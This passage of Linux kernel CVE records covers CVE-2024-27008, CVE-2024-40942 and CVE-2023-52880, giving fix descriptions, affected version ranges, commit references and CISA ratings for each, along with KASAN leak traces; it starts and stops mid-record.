            "url": "https://git.kernel.org/stable/c/6690cc2732e2a8d0eaca44dcbac032a4b0148042"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/26212da39ee14a52c76a202c6ae5153a84f579a5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cf92bb778eda7830e79452c6917efa8474a30c1e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/nouveau/nouveau_bios.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c2b97f26f081ceec3298151481687071075a25cb",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "5050ae879a828d752b439e3827aac126709da6d1",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "097c7918fcfa1dee233acfd1f3029f00c3bc8062",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "df0991da7db846f7fa4ec6740350f743d3b69b04",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "5fd4b090304e450aa0e7cc9cc2b4873285c6face",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "6690cc2732e2a8d0eaca44dcbac032a4b0148042",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "26212da39ee14a52c76a202c6ae5153a84f579a5",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            },
            {
              "lessThan": "cf92bb778eda7830e79452c6917efa8474a30c1e",
              "status": "affected",
              "version": "2e5702aff39532662198459726c624d5eadbdd78",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/nouveau/nouveau_bios.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.38"
            },
            {
              "lessThan": "2.6.38",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.157",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.157",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: nv04: Fix out of bounds access\n\nWhen Output Resource (dcb-\u003eor) value is assigned in\nfabricate_dcb_output(), there may be out of bounds access to\ndac_users array in case dcb-\u003eor is zero because ffs(dcb-\u003eor) is\nused as index there.\nThe \u0027or\u0027 argument of fabricate_dcb_output() must be interpreted as a\nnumber of bit to set, not value.\n\nUtilize macros from \u0027enum nouveau_or\u0027 in calls instead of hardcoding.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:02:03.592Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c2b97f26f081ceec3298151481687071075a25cb"
        },
        {
          "url": "https://git.kernel.org/stable/c/5050ae879a828d752b439e3827aac126709da6d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/097c7918fcfa1dee233acfd1f3029f00c3bc8062"
        },
        {
          "url": "https://git.kernel.org/stable/c/df0991da7db846f7fa4ec6740350f743d3b69b04"
        },
        {
          "url": "https://git.kernel.org/stable/c/5fd4b090304e450aa0e7cc9cc2b4873285c6face"
        },
        {
          "url": "https://git.kernel.org/stable/c/6690cc2732e2a8d0eaca44dcbac032a4b0148042"
        },
        {
          "url": "https://git.kernel.org/stable/c/26212da39ee14a52c76a202c6ae5153a84f579a5"
        },
        {
          "url": "https://git.kernel.org/stable/c/cf92bb778eda7830e79452c6917efa8474a30c1e"
        }
      ],
      "title": "drm: nv04: Fix out of bounds access",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27008",
    "datePublished": "2024-05-01T05:29:13.312Z",
    "dateReserved": "2024-02-19T14:20:24.208Z",
    "dateUpdated": "2025-11-04T17:16:46.306Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40942 (GCVE-0-2024-40942)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:25 – Updated: 2025-11-03 21:58

Title

wifi: mac80211: mesh: Fix leak of mesh_preq_queue objects

Summary

In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: mesh: Fix leak of mesh_preq_queue objects The hwmp code use objects of type mesh_preq_queue, added to a list in ieee80211_if_mesh, to keep track of mpath we need to resolve. If the mpath gets deleted, ex mesh interface is removed, the entries in that list will never get cleaned. Fix this by flushing all corresponding items of the preq_queue in mesh_path_flush_pending(). This should take care of KASAN reports like this: unreferenced object 0xffff00000668d800 (size 128): comm "kworker/u8:4", pid 67, jiffies 4295419552 (age 1836.444s) hex dump (first 32 bytes): 00 1f 05 09 00 00 ff ff 00 d5 68 06 00 00 ff ff ..........h..... 8e 97 ea eb 3e b8 01 00 00 00 00 00 00 00 00 00 ....>........... backtrace: [<000000007302a0b6>] __kmem_cache_alloc_node+0x1e0/0x35c [<00000000049bd418>] kmalloc_trace+0x34/0x80 [<0000000000d792bb>] mesh_queue_preq+0x44/0x2a8 [<00000000c99c3696>] mesh_nexthop_resolve+0x198/0x19c [<00000000926bf598>] ieee80211_xmit+0x1d0/0x1f4 [<00000000fc8c2284>] __ieee80211_subif_start_xmit+0x30c/0x764 [<000000005926ee38>] ieee80211_subif_start_xmit+0x9c/0x7a4 [<000000004c86e916>] dev_hard_start_xmit+0x174/0x440 [<0000000023495647>] __dev_queue_xmit+0xe24/0x111c [<00000000cfe9ca78>] batadv_send_skb_packet+0x180/0x1e4 [<000000007bacc5d5>] batadv_v_elp_periodic_work+0x2f4/0x508 [<00000000adc3cd94>] process_one_work+0x4b8/0xa1c [<00000000b36425d1>] worker_thread+0x9c/0x634 [<0000000005852dd5>] kthread+0x1bc/0x1c4 [<000000005fccd770>] ret_from_fork+0x10/0x20 unreferenced object 0xffff000009051f00 (size 128): comm "kworker/u8:4", pid 67, jiffies 4295419553 (age 1836.440s) hex dump (first 32 bytes): 90 d6 92 0d 00 00 ff ff 00 d8 68 06 00 00 ff ff ..........h..... 36 27 92 e4 02 e0 01 00 00 58 79 06 00 00 ff ff 6'.......Xy..... backtrace: [<000000007302a0b6>] __kmem_cache_alloc_node+0x1e0/0x35c [<00000000049bd418>] kmalloc_trace+0x34/0x80 [<0000000000d792bb>] mesh_queue_preq+0x44/0x2a8 [<00000000c99c3696>] mesh_nexthop_resolve+0x198/0x19c [<00000000926bf598>] ieee80211_xmit+0x1d0/0x1f4 [<00000000fc8c2284>] __ieee80211_subif_start_xmit+0x30c/0x764 [<000000005926ee38>] ieee80211_subif_start_xmit+0x9c/0x7a4 [<000000004c86e916>] dev_hard_start_xmit+0x174/0x440 [<0000000023495647>] __dev_queue_xmit+0xe24/0x111c [<00000000cfe9ca78>] batadv_send_skb_packet+0x180/0x1e4 [<000000007bacc5d5>] batadv_v_elp_periodic_work+0x2f4/0x508 [<00000000adc3cd94>] process_one_work+0x4b8/0xa1c [<00000000b36425d1>] worker_thread+0x9c/0x634 [<0000000005852dd5>] kthread+0x1bc/0x1c4 [<000000005fccd770>] ret_from_fork+0x10/0x20

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/377dbb220edc8421b…
	https://git.kernel.org/stable/c/ec79670eae430b3ff…
	https://git.kernel.org/stable/c/7518e20a189f8659b…
	https://git.kernel.org/stable/c/c4c865f971fd4a255…
	https://git.kernel.org/stable/c/617dadbfb2d3e152c…
	https://git.kernel.org/stable/c/63d5f89bb5664d60e…
	https://git.kernel.org/stable/c/d81e244af521de63a…
	https://git.kernel.org/stable/c/b7d7f11a291830fdf…

Impacted products

Vendor

Product

Version

Linux

Affected: 050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e , < 377dbb220edc8421b7960691876c5b3bef62f89b (git)
Affected: 050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e , < ec79670eae430b3ffb7e0a6417ad7657728b8f95 (git)
Affected: 050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e , < 7518e20a189f8659b8b83969db4d33a4068fcfc3 (git)
Affected: 050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e , < c4c865f971fd4a255208f57ef04d814c2ae9e0dc (git)
Affected: 050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e , < 617dadbfb2d3e152c5753e28356d189c9d6f33c0 (git)
Affected: 050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e , < 63d5f89bb5664d60edbf8cf0df911aaae8ed96a4 (git)
Affected: 050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e , < d81e244af521de63ad2883e17571b789c39b6549 (git)
Affected: 050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e , < b7d7f11a291830fdf69d3301075dd0fb347ced84 (git)

Linux

Affected: 2.6.26
Unaffected: 0 , < 2.6.26 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.95 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:58:11.294Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/377dbb220edc8421b7960691876c5b3bef62f89b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ec79670eae430b3ffb7e0a6417ad7657728b8f95"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7518e20a189f8659b8b83969db4d33a4068fcfc3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c4c865f971fd4a255208f57ef04d814c2ae9e0dc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/617dadbfb2d3e152c5753e28356d189c9d6f33c0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/63d5f89bb5664d60edbf8cf0df911aaae8ed96a4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d81e244af521de63ad2883e17571b789c39b6549"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b7d7f11a291830fdf69d3301075dd0fb347ced84"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40942",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:04:23.938409Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:25.698Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/mac80211/mesh_pathtbl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "377dbb220edc8421b7960691876c5b3bef62f89b",
              "status": "affected",
              "version": "050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e",
              "versionType": "git"
            },
            {
              "lessThan": "ec79670eae430b3ffb7e0a6417ad7657728b8f95",
              "status": "affected",
              "version": "050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e",
              "versionType": "git"
            },
            {
              "lessThan": "7518e20a189f8659b8b83969db4d33a4068fcfc3",
              "status": "affected",
              "version": "050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e",
              "versionType": "git"
            },
            {
              "lessThan": "c4c865f971fd4a255208f57ef04d814c2ae9e0dc",
              "status": "affected",
              "version": "050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e",
              "versionType": "git"
            },
            {
              "lessThan": "617dadbfb2d3e152c5753e28356d189c9d6f33c0",
              "status": "affected",
              "version": "050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e",
              "versionType": "git"
            },
            {
              "lessThan": "63d5f89bb5664d60edbf8cf0df911aaae8ed96a4",
              "status": "affected",
              "version": "050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e",
              "versionType": "git"
            },
            {
              "lessThan": "d81e244af521de63ad2883e17571b789c39b6549",
              "status": "affected",
              "version": "050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e",
              "versionType": "git"
            },
            {
              "lessThan": "b7d7f11a291830fdf69d3301075dd0fb347ced84",
              "status": "affected",
              "version": "050ac52cbe1f3de2fb0d06f02c7919ae1f691c9e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/mac80211/mesh_pathtbl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.26"
            },
            {
              "lessThan": "2.6.26",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.95",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.95",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: mesh: Fix leak of mesh_preq_queue objects\n\nThe hwmp code use objects of type mesh_preq_queue, added to a list in\nieee80211_if_mesh, to keep track of mpath we need to resolve. If the mpath\ngets deleted, ex mesh interface is removed, the entries in that list will\nnever get cleaned. Fix this by flushing all corresponding items of the\npreq_queue in mesh_path_flush_pending().\n\nThis should take care of KASAN reports like this:\n\nunreferenced object 0xffff00000668d800 (size 128):\n  comm \"kworker/u8:4\", pid 67, jiffies 4295419552 (age 1836.444s)\n  hex dump (first 32 bytes):\n    00 1f 05 09 00 00 ff ff 00 d5 68 06 00 00 ff ff  ..........h.....\n    8e 97 ea eb 3e b8 01 00 00 00 00 00 00 00 00 00  ....\u003e...........\n  backtrace:\n    [\u003c000000007302a0b6\u003e] __kmem_cache_alloc_node+0x1e0/0x35c\n    [\u003c00000000049bd418\u003e] kmalloc_trace+0x34/0x80\n    [\u003c0000000000d792bb\u003e] mesh_queue_preq+0x44/0x2a8\n    [\u003c00000000c99c3696\u003e] mesh_nexthop_resolve+0x198/0x19c\n    [\u003c00000000926bf598\u003e] ieee80211_xmit+0x1d0/0x1f4\n    [\u003c00000000fc8c2284\u003e] __ieee80211_subif_start_xmit+0x30c/0x764\n    [\u003c000000005926ee38\u003e] ieee80211_subif_start_xmit+0x9c/0x7a4\n    [\u003c000000004c86e916\u003e] dev_hard_start_xmit+0x174/0x440\n    [\u003c0000000023495647\u003e] __dev_queue_xmit+0xe24/0x111c\n    [\u003c00000000cfe9ca78\u003e] batadv_send_skb_packet+0x180/0x1e4\n    [\u003c000000007bacc5d5\u003e] batadv_v_elp_periodic_work+0x2f4/0x508\n    [\u003c00000000adc3cd94\u003e] process_one_work+0x4b8/0xa1c\n    [\u003c00000000b36425d1\u003e] worker_thread+0x9c/0x634\n    [\u003c0000000005852dd5\u003e] kthread+0x1bc/0x1c4\n    [\u003c000000005fccd770\u003e] ret_from_fork+0x10/0x20\nunreferenced object 0xffff000009051f00 (size 128):\n  comm \"kworker/u8:4\", pid 67, jiffies 4295419553 (age 1836.440s)\n  hex dump (first 32 bytes):\n    90 d6 92 0d 00 00 ff ff 00 d8 68 06 00 00 ff ff  ..........h.....\n    36 27 92 e4 02 e0 01 00 00 58 79 06 00 00 ff ff  6\u0027.......Xy.....\n  backtrace:\n    [\u003c000000007302a0b6\u003e] __kmem_cache_alloc_node+0x1e0/0x35c\n    [\u003c00000000049bd418\u003e] kmalloc_trace+0x34/0x80\n    [\u003c0000000000d792bb\u003e] mesh_queue_preq+0x44/0x2a8\n    [\u003c00000000c99c3696\u003e] mesh_nexthop_resolve+0x198/0x19c\n    [\u003c00000000926bf598\u003e] ieee80211_xmit+0x1d0/0x1f4\n    [\u003c00000000fc8c2284\u003e] __ieee80211_subif_start_xmit+0x30c/0x764\n    [\u003c000000005926ee38\u003e] ieee80211_subif_start_xmit+0x9c/0x7a4\n    [\u003c000000004c86e916\u003e] dev_hard_start_xmit+0x174/0x440\n    [\u003c0000000023495647\u003e] __dev_queue_xmit+0xe24/0x111c\n    [\u003c00000000cfe9ca78\u003e] batadv_send_skb_packet+0x180/0x1e4\n    [\u003c000000007bacc5d5\u003e] batadv_v_elp_periodic_work+0x2f4/0x508\n    [\u003c00000000adc3cd94\u003e] process_one_work+0x4b8/0xa1c\n    [\u003c00000000b36425d1\u003e] worker_thread+0x9c/0x634\n    [\u003c0000000005852dd5\u003e] kthread+0x1bc/0x1c4\n    [\u003c000000005fccd770\u003e] ret_from_fork+0x10/0x20"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:18:27.736Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/377dbb220edc8421b7960691876c5b3bef62f89b"
        },
        {
          "url": "https://git.kernel.org/stable/c/ec79670eae430b3ffb7e0a6417ad7657728b8f95"
        },
        {
          "url": "https://git.kernel.org/stable/c/7518e20a189f8659b8b83969db4d33a4068fcfc3"
        },
        {
          "url": "https://git.kernel.org/stable/c/c4c865f971fd4a255208f57ef04d814c2ae9e0dc"
        },
        {
          "url": "https://git.kernel.org/stable/c/617dadbfb2d3e152c5753e28356d189c9d6f33c0"
        },
        {
          "url": "https://git.kernel.org/stable/c/63d5f89bb5664d60edbf8cf0df911aaae8ed96a4"
        },
        {
          "url": "https://git.kernel.org/stable/c/d81e244af521de63ad2883e17571b789c39b6549"
        },
        {
          "url": "https://git.kernel.org/stable/c/b7d7f11a291830fdf69d3301075dd0fb347ced84"
        }
      ],
      "title": "wifi: mac80211: mesh: Fix leak of mesh_preq_queue objects",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40942",
    "datePublished": "2024-07-12T12:25:17.149Z",
    "dateReserved": "2024-07-12T12:17:45.587Z",
    "dateUpdated": "2025-11-03T21:58:11.294Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2023-52880 (GCVE-0-2023-52880)

Vulnerability from cvelistv5 – Published: 2024-05-24 15:33 – Updated: 2026-01-05 10:17

Title

tty: n_gsm: require CAP_NET_ADMIN to attach N_GSM0710 ldisc

Summary

In the Linux kernel, the following vulnerability has been resolved: tty: n_gsm: require CAP_NET_ADMIN to attach N_GSM0710 ldisc Any unprivileged user can attach N_GSM0710 ldisc, but it requires CAP_NET_ADMIN to create a GSM network anyway. Require initial namespace CAP_NET_ADMIN to do that.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7d303dee473ba3529…
	https://git.kernel.org/stable/c/7a529c9023a197ab3…
	https://git.kernel.org/stable/c/ada28eb4b9561aab9…
	https://git.kernel.org/stable/c/2d154a54c58f9c837…
	https://git.kernel.org/stable/c/2b85977977cbd1205…
	https://git.kernel.org/stable/c/67c37756898a5a6b2…

Impacted products

Vendor

Product

Version

Linux

Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 7d303dee473ba3529d75b63491e9963342107bed (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 7a529c9023a197ab3bf09bb95df32a3813f7ba58 (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < ada28eb4b9561aab93942f3224a2e41d76fe57fa (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 2d154a54c58f9c8375bfbea9f7e51ba3bfb2e43a (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 2b85977977cbd120591b23c2450e90a5806a7167 (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 67c37756898a5a6b2941a13ae7260c89b54e0d88 (git)

Linux

Affected: 2.6.35
Unaffected: 0 , < 2.6.35 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-52880",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-24T19:10:27.057428Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:23:31.686Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:18:41.167Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7d303dee473ba3529d75b63491e9963342107bed"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7a529c9023a197ab3bf09bb95df32a3813f7ba58"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ada28eb4b9561aab93942f3224a2e41d76fe57fa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2d154a54c58f9c8375bfbea9f7e51ba3bfb2e43a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2b85977977cbd120591b23c2450e90a5806a7167"
          },
          {
            "tags": [
              "x_transferred"
